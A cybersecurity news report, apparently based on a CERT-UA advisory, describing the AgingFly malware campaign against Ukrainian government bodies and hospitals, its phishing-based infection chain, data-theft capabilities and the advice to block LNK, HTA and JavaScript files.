A novel malware strain, dubbed ‘AgingFly,’ has been spotted in a series of cyberattacks targeting Ukrainian governments and hospitals with the goal of stealing authentication data from Chromium-based browsers and the WhatsApp desktop app.
The campaign was uncovered last month by CERT-UA, which linked the activity to a threat cluster tracked as UAC-0247. The cybersecurity agency believes the attacks may also target individuals connected to Ukraine’s Defense Forces.
The attack begins with phishing emails disguised as humanitarian aid offers. Victims are lured into clicking malicious links that either redirect to compromised legitimate websites exploiting cross-site scripting vulnerabilities or to convincing AI-generated fake pages. From there, targets are prompted to download an archive containing a shortcut (LNK) file that initiates a complex infection chain.
Once executed, the file launches a built-in HTA handler that retrieves additional malicious components. A decoy form is displayed to distract the user while the malware establishes persistence via scheduled tasks and injects shellcode into legitimate processes. On the following stages, encrypted payloads are deployed responsible for establishing a reverse shell connection to a command-and-control (C&C) server.
AgingFly is a C#-based malware capable of remote command execution, file exfiltration, screenshot capture, and keylogging. It communicates with its operators through encrypted WebSocket connections using AES-CBC encryption.
To harvest sensitive data, attackers leverage open-source tools such as ChromElevator to extract cookies and saved passwords from browsers like Chrome, Edge, and Brave without requiring administrator privileges. Additionally, they use ZAPiDESK to decrypt and access data stored by the Windows version of WhatsApp.
The attackers also conduct network reconnaissance and lateral movement using such utilities as RustScan, Ligolo-ng, and Chisel.
One of AgingFly’s most unusual features is its ability to dynamically compile command handlers directly on infected machines using source code delivered from the C&C server. This allows attackers to modify functionality in real time while keeping the initial malware footprint small.
CERT-UA advises organizations to mitigate exposure by blocking the execution of LNK, HTA, and JavaScript files.